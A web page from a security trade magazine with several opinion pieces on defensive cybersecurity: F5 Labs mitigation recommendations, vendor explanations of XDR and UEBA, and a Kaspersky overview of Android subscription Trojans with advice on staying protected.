Connect with us

Expert Speak

Cybersecurity Mitigations No Organisation Can Afford to Ignore

Published

on

Sander Vinberg, the Senior Threat Evangelist at F5 Labs, highlights the tactics organisations need to stay safe

Every year, F5 Labs publishes the Application Protection Report. Our goal is to document the evolution of the threat landscape so that security practitioners can fine-tune their defenses accordingly. The report aims to clarify the relationship between target characteristics and attacker behaviour so that each organization can focus on the threats that apply most to them.

Based on our research, these are the cybersecurity mitigation measures no organisation can afford to ignore. (Note – The analysis is primarily based on successful attacks, so the recommendations are more of a bare minimum than a complete, holistic security architecture).

Data Backup
Data backups need to be part of every organization’s strategy, and it is often difficult to assess the robustness of a backup program until it is tested. Many good backup programs employ several different modes, with longer-term backups air-gapped, stored on physical media off-site, or using other degrees of protection.

However, beginning in 2020, ransomware strategies evolved to exfiltrate data before triggering encryption, which reduces the power that even good backups have to control ransomware risk completely. Sure, with the right backups you can restore operations once your environment is cleaned up, but the data is gone, and you still have to deal with the attacker and ransom. A robust ransomware strategy needs to start with backup, but the preceding attacker behaviours, the methods of initial access, lateral movement, execution, persistence, and exfiltration need to be controlled as well.

Application Isolation and Sandboxing
This primarily takes the form of various forms of virtualization, such as virtual machines, containers, and browser sandboxing. This type of control can help mitigate several exploit-based approaches observed in 2021, including Exploitation for Client Execution, Exploit Public-Facing Application, and Drive-by Compromise.

Exploit Protection
The most obvious form of exploit protection is the use of a web application firewall (WAF). Despite the declining prevalence of web exploits in the data, a WAF is still critical for operating a modern web application. It is also a requirement for PCI-DSS, which applies specifically to the credit card numbers so heavily targeted by formjacking attacks. There are also a growing number of behavioural approaches to exploit protection that appear promising.

Network Segmentation
Network segmentation is a particularly underrated control, given how ransomware approaches have changed the threat landscape since the pandemic began.

It can shut down a huge number of attack vectors, five of which were observed in the 2021 data: Exploit Public-Facing Application, Automated Exfiltration, Exfiltration Over Web Service, External Remote Services, and Exploitation of Remote Services.

Furthermore, it makes exfiltration and lateral movement particularly difficult. Some cloud-native applications may have implemented the same control objectives using identity and access management, but for organizations with hybrid environments or legacy applications in the process of moving to the cloud, this is still an important approach.

Privileged Account Management
While the creation of privileged accounts is straightforward, the deletion of them is often overlooked, so they should be audited regularly to ensure they are decommissioned when they are no longer necessary.

Update Software
The log4shell campaign that unfolded in late December 2021 is a reminder of the importance of software maintenance, not merely the software organizations produce or use, but all of the subcomponents and libraries necessary to keep everything running.

Vulnerability Scanning
Regular vulnerability scanning adds situational awareness and flexibility to a vulnerability management program. This should include a public-facing scan from the Internet and an internal scan to assess how an environment appears to attackers.

Code Signing
Code signing is another underused approach, in light of architectural trends that pull code from disparate sources at runtime. In particular, sub-resource integrity (SRI) headers can ensure that external scripts haven’t been modified when they are called at runtime. As applications increasingly rely on external scripts to pull in new features, SRI is a powerful tool to shut down vectors, including many of the initial access techniques seen in formjacking and Magecart attacks.

Restrict Web-Based Content
|This is a broad-reaching control objective that can manifest in many ways, but all centering on controlling avenues for both unauthorised access and exfiltration, such as blocking specific file types, known malicious IP addresses, and external scripts. This approach can shut off a wide range of attack vectors, including malicious script injection, phishing, and malvertising.

Content security policies (CSPs) appear underused for such a powerful and free control for restricting web content. During a scan that F5 Labs ran in August 2021 for the 2021 TLS Telemetry Report, HTTP response headers for the Tranco top 1 million sites were also collected. Just over 6% of the top 1 million had a CSP header in the server response. The most frequent directive in those CSPs was upgrade-insecure-requests, which ensures that cross-site requests travel over HTTPS. Upgrade-insecure-requests showed up in 2.5% of sites, followed closely by frame-ancestors. Other elements that are more frequent vectors for injection of malicious scripts, such as script-src, img-src, and frame-src, are less common.

Network Intrusion Prevention
Intrusion prevention systems are no longer the leading-edge controls that they were a decade or more ago, but as lateral movement and deployment of malware appear to be on the rise, this kind of control is valuable as part of a defense-in-depth approach that also uses a WAF and other controls.

Antivirus/Antimalware
Every organisation of every type should have antimalware capabilities. However, because malware needs to be placed on a system to work, it is never the first step in an attack. Because of this, antimalware needs to be part of a more holistic strategy.

Disable or Remove Feature or Program
While the corresponding attack techniques were observed in only 12% of attack chains, disabling or removing features or programs would mitigate five observed techniques in the 2021 data: Command and Scripting Interpreter, Exfiltration Over Web Service, External Remote Services, Exploitation of Remote Services, and Cloud Instance Metadata API. The log4shell events in December 2021 are a reminder that zero trust and least privilege need to apply to systems as well as people as applications and environments grow in complexity.

Special Mention: Cloud Configuration Management
The absence of configuration management or change management structures from on-premises days does not obviate the need for a corresponding structure in the cloud. Guides and information for cloud configuration management are plentiful for all public clouds, and organisations running customer-facing applications in the cloud should treat these guides as doctrine.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published.

Cyber Security

It’s Time to Debunk XDR Misconceptions Floating Around

Published

on

Written by Yossi Naar, Chief Visionary Officer, and Cofounder, Cybereason

Extended Detection and Response (XDR) is everywhere today, and it seems that every company is rolling out a strategy and products to meet the growing demand. According to the industry analyst firm Gartner, XDR is “a SaaS-based, vendor-specific, security threat detection and incident response tool that natively integrates multiple security products into a cohesive security operations system that unifies all licensed components.”

Notwithstanding XDR’s tremendous growth in adoption, more than a few misconceptions about XDR remain, so let’s debunk three of those myths here:

Myth 1: XDR is all about Endpoint Security
No, that’s what Endpoint Detection and Response (EDR) does, which is just one aspect of what XDR delivers. EDR solutions focus solely on the endpoint, and they don’t correlate intelligence from the cloud and other parts of an organization’s infrastructure.

In fact, most EDR platforms are not even capable of ingesting all of the relevant endpoint telemetry and are forced to “filter out” intelligence without even knowing if that information is critical to making a detection because the solutions cannot handle the volumes of data generated.

Indeed, there are vendors that simply cannot ingest all available telemetry for EDR, yet they profess to be able to deliver an XDR solution that ingests endpoint data plus an array of telemetry from numerous other sources on the network and in the cloud.

Data filtering negatively impacts the ability to proactively thwart attacks because it omits telemetry that could allow for earlier detection of malicious activity. When broadened to include non-endpoint sources, data filtering can further distort an organization’s visibility into the threats confronting them.

XDR does not suffer from these limitations. It extends continuous threat detection and monitoring as well as an automated response to endpoints, applications, cloud workloads, and the network…all without data filtering. This helps to ensure the high fidelity of a threat detection yielded by XDR.

Myth 2: XDR Should be Augmented by a SIEM
It’s true that XDR delivers some of the same functionality as SIEM (Security Information and Event Management) tools. Chief among their similarities is the ability to aggregate and correlate data from a variety of sources spread across an organization’s infrastructure, thereby providing the required visibility for threat detection, investigation and response.

But there are several key factors that hold SIEMs back: SIEMs are nothing without the data lake structure and cloud analytics they need to centralize security events. Those resources vary in the types and quality of data to which they have access, a reality that affects the value and effectiveness of a SIEM.

There are also the costs, time, and other resources involved with building, tuning, and maintaining a SIEM. Tuning is an especially common pain point with SIEMs. Indeed, these tools frequently generate false positives and an overwhelming volume of alerts.

Such noise contributes to “alert fatigue” in the organization, motivating infosec personnel to overlook the deluge of alerts coming in and miss opportunities to launch investigations at the earliest signs of an incursion. Simultaneously, SIEMs don’t do much to help security teams with executing a response beyond generating a lot of alerts that need to be manually triaged.

XDR, by contrast, doesn’t require any data lake structure. It correlates alerts across disparate network assets to deliver actionable intelligence that works to reduce alert fatigue. What’s more, XDR enables security teams to build automated playbooks using the platform itself, thereby streamlining response.

Myth 3: All XDR Platforms Are Created Equal
No. Consider the fact that there’s hybrid/open vs. native XDR. The latter only offers integrations to other security tools developed by the same vendor. This can lock customers into an agreement with a vendor that might not offer the security capabilities they need to protect their systems and data. It also means existing investments in solutions from other vendors cannot be fully realized.

In contrast, Open (or hybrid) XDR takes a collective approach that leverages multiple security tools, vendors, and telemetry types to meet organizations’ needs from within a single detection and response platform. There’s no vendor lock-in here. Security teams are free to choose the vendors and tools they want, allowing them to get the most out of their XDR platform, and the DevOps and API integrations enable personnel to bring these tools and telemetry sources together.

There’s also an argument to be made about what defines a truly mature XDR offering versus pseudo-XDR solutions that are basically nothing more than an EDR tool with cloud integration. All XDR platforms integrate with threat intelligence to spot known Indicators of Compromise (IOCs), but only an advanced XDR solution can detect them based on Indicators of Behavior (IOBs).

IOBs are the more subtle signs of an attack in progress which include otherwise benign activity one would expect to see occurring on a network. When these “legitimate” behaviors are chained in certain sequences, they produce conditions that are either exceedingly rare or represent a distinct advantage for an attacker.

This is where the context-rich correlations across endpoints, the cloud, application suites, and user identities that a mature XDR solution delivers are critical for detecting malicious activity at the earliest stages of an attack. Take ransomware attacks for example – most security solutions are focused on detecting the exploit and blocking the ransomware payload, or rolling back the encryption after the attack was successful. But the detonation of the ransomware executable is the tail end of what is actually a much longer attack sequence, with weeks or even months of detectable activity from initial ingress, to lateral movement, to credential abuse and privilege escalation, to name a few.

An AI-driven XDR solution can make the necessary correlations to detect that activity long before the ransomware payload is delivered, reducing a potentially devastating attack to the level of an intrusion attempt or similar. Additionally, the ability to leverage AI/ML to correlate telemetry from across an organization’s infrastructure is a key aspect of a mature XDR solution. The application of AI/ML allows Defenders to move from a detect and respond mode to a more proactive “predictive response” posture where the next steps an attack can and would take are instantly anticipated and blocked, eliminating the opportunity to progress the attack to the next stage.

This predictive capability is the key to the future of security, enabling organizations to “defend forward” by understanding attacks from an operation-centric approach, where analysts are freed from chasing alerts that point to individual elements of an attack in favor of a holistic view of the entire attack story from root cause to every affected device, system and user. And only an AI-driven XDR solution can deliver this “predictive response” capability that will shorten detection and remediation periods from days or weeks down to minutes.

The AI-Driven XDR Advantage
An AI-driven XDR solution enables organizations to embrace an operation-centric approach to security that delivers the visibility organizations require to be confident in their security posture across all network assets, and the automated responses to halt attack progressions at the earliest stages. This approach also provides defenders with the ability to predict, detect and respond to cyberattacks across the entire enterprise, including endpoints, networks, identities, cloud, application workspaces, and more.

Continue Reading

Expert Speak

Finding Patterns in the Chaos With User and Entity Behaviour Analytics (UEBA)

Published

on

Written by Sundaram Lakshmanan, CTO of SASE products at Lookout

There’s a great scene in the 1997 film “Contact” where the protagonist Dr. Eleanor Arroway, played by Jodie Foster, is informed that her lab’s funding has just been revoked. Arroway’s lab partner explained that the government lost faith in the project due to concerns about her engaging in questionable activities, such as watching static on TV for hours. To this, she responds angrily: “I was looking for patterns in the chaos, come on!”

This is a great analogy to what User and Entity Behaviour Analytics (UEBA) does automatically for you, so you don’t have to. While Arroway may have been looking for signs of life on different planets, spotting abnormal or malicious patterns in user and entity behaviour can be just as difficult with the bare eye.

On any given day, your employees will log into the cloud or on-premises applications, download, and upload files and respond to authentication requests. Tracking these behaviours can be data-intensive, especially when considering all the different devices and apps your employees use to stay productive, what their location is and what times they typically interact with apps.

This is where UEBA comes in. Instead of relying on static security checks or staring continuously at the static, you can use automated security to look at user behaviours to detect both insider and external threats, and prevent data leakage or ransomware attacks.

How UEBA works
To put it simply, UEBA is a cybersecurity process that monitors normal user behaviour and flags deviations from established patterns. While a perpetrator can easily steal an employee’s username and password, it’s much harder to imitate that person’s normal behaviour on the network connecting to apps and data. UEBA also helps detect unintentional or intentional insider threats, where an authorized user does something that is harmful to your organization.

In many ways, UEBA is like a credit card fraud detection engine. UEBA uses machine learning and data analytics to determine when there is anomalous behaviour that could result in a potential security threat. For example, if I normally only download megabytes of files every day but suddenly download gigabytes of files, a UEBA system would detect this anomaly and alert the enterprise security team to respond.

Geo-anomalies are also tell-tale signs for anomalous or malicious behaviour: if someone signs into a work account from Dubai, but minutes later an account login is observed across the world in the San Francisco, the UEBA system would automatically detect this anomaly and enable an automated response to protect data available to the account.

I remember an incident with one of our customers where UEBA ended up detecting and halting a ransomware attack. This customer gave their partners access to their Box cloud content management system. Having UEBA in place, their security team received an automated detection of a large volume of files that were deleted and replaced by encrypted files, which were quickly uploaded and renamed. Due to early detection, the security team was able to quarantine the account and restore the files.

UEBA vs. Security Information and Event Management (SIEM)
SIEMs enable security teams to aggregate large volumes of disparate data sets, security alerts and events from multiple sources into a single console for processing and analysis. They have workflows and rule engines that make sense from the processed datasets that further enable administrators to prioritize and manage incidents and alerts better.

With powerful searches, queries, dashboards and rule-based engines, most SIEMs give a full 360° view of the enterprise systems and enable admins to manage incidents in a timely manner. In some cases, they also do spot trends and create correlation rules to trigger appropriate mitigation steps.

Although at first glance, UEBA and SIEM may appear to do the same thing, there are a few key differences. Unlike a SIEM, UEBA does not track security events or monitor devices. Instead, UEBA tracks the behaviours of users and entities within your environment — such as devices, applications and data — for anomalies that may indicate a threat. While UEBA also analyzes a lot of data, it uses machine intelligence to automate and scale its analysis of patterns instead of just relying on human intelligence.

UEBA works best when paired with a holistic platform
While I hope this article has given you a good understanding of UEBA and why it’s important, I want to stress that this is just one piece of a modern cybersecurity architecture. There are two other major elements to consider: continuously monitoring the risk posture of endpoint devices and the sensitivity of the apps and data accessed by users and endpoints.

Whether you realize it or not, every one of your employees is using some form of personal devices to work from anywhere. This means you need to track the fluctuating risk posture of both the managed and unmanaged devices to protect your data at all times. By enforcing policies based on user behaviour, endpoint risk posture as well as data sensitivity, you can protect your data without hindering productivity.

Continue Reading

Expert Speak

How Scammers Subscribe Mobile Users to Unwanted Paid Services

Published

on

With an ever growing number of smartphone users, the development of mobile applications has become a booming industry. Today there are millions of apps, helping users with almost every c of their everyday life – from entertainment to banking and billing. With this in mind, cybercriminals are working hard to develop their own apps and benefit from unsuspecting users.

Kaspersky researchers have observed fraudsters actively spreading Trojans, which secretly subscribe users to paid services, disguised as various different mobile apps, including popular games, healthcare apps and photo editors. Most of these Trojans request access to the user’s notifications and messages, so that the fraudsters can then intercept messages containing confirmation codes.

Users aren’t knowingly subscribing to these services but are, rather, falling victim to carelessness. For instance, a user fails to read the fine print and, before they know it, they’re paying for a horoscope app. These victims often don’t realize these subscriptions exist until their mobile phone account runs dry earlier than expected.

According to Kaspersky researchers, the most widely spread Trojans that sign users up to unwanted subscriptions are:

Jocker
Trojans from the Trojan.AndroidOS.Jocker family can intercept codes sent in text messages and bypass anti-fraud solutions. They’re usually spread on Google Play, where scammers download a legitimate app from the store, add malicious code to it and then re-upload it under a different name. In most cases, these trojanized apps fulfill their purpose and the user never suspects that they’re a source of threat.

So far in 2022, Jocker has most frequently attacked users in Saudi Arabia (21.20%), Poland, (8.98%) and Germany (6.01%).

MobOk
MobOk is considered the most active of the subscription Trojans with more than 70% of mobile users encountering these threats. MobOk Trojan is particularly notable for an additional capability that, in addition to reading the codes from messages, enables it to bypass CAPTCHA. MobOK does this by automatically sending the image to a service designed to decipher the code shown .

Since the beginning of the year, MobOk Trojan has most frequently attacked users in Russia (31.01%), India (11.17%) and Indonesia (11.02%).

Vesub
Vesub Trojan is spread through unofficial sources and imitates popular games and apps, such as GameBeyond, Tubemate, Minecraft, GTA5 and Vidmate. This malware opens an invisible window, requests a subscription and then enters the code it intercepts from the victim’s received text messages. After that the user is subscribed to a service without their knowledge or consent.

Most of these apps lack any legitimate functionality. They subscribe users as soon as they are launched while victims just see a loading window. However, there are some examples, such as a fake GameBeyond app, where the detected malware is actually accompanied by a random set of functional games.

Two out of five users who encountered Vesub were in Egypt (40.27%). This Trojan family has also been active in Thailand (25.88%) and Malaysia (15.85%).

GriftHorse.l
Unlike the Trojans mentioned above, this one does not subscribe victims to a third-party service – instead it uses its own. Users end up subscribing to one of these services by simply not reading the user agreement carefully. For example, there are apps that have recently spread intensively on Google Play, offering to tailor personal weight-loss plans for a token fee. Such apps contain small print mentioning a subscription fee with automatic billing. This means money will be deducted from the user’s bank account on a regular basis without needing any further confirmation from the user.

“Apps can help us stay connected, fit, entertained and generally make our lives easier. There are multiple mobile apps appearing every day, for every taste and purpose – unfortunately, cybercriminals are using this to their advantage. Some of the apps are designed to steal money by subscribing users to unwanted services. These threats are preventable, which is why it’s important to be aware of the signs that give away Trojanized apps. Even if you trust an app, you should avoid granting it too many permissions. Only allow access to notifications for apps that need it to perform their intended purposes, for example, to transfer notifications to wearable devices. Apps for something like themed wallpapers or photo editing don’t need access to your notifications,” explains Igor Golovin, security expert at Kaspersky.

Here’s what you need to do, to stay protected:

  • Keeping your guard up when installing apps from Google Play. Read the reviews, research the developer, terms of use and payment details. For messaging, choose a well-known app with positive reviews.
  • Checking the permissions of the apps you’re using and thinking carefully before granting additional permissions.
  • Using a reliable security solution to help detect malicious apps and adware before they achieve their goals.
  • Updating your operating system and any important apps as and when updates become available. Many safety issues can be solved by installing the updated versions of software.
Continue Reading
Advertisement


Follow Us

Trending

Copyright © 2021 Security Review Magazine. Rysha Media LLC. All Rights Reserved.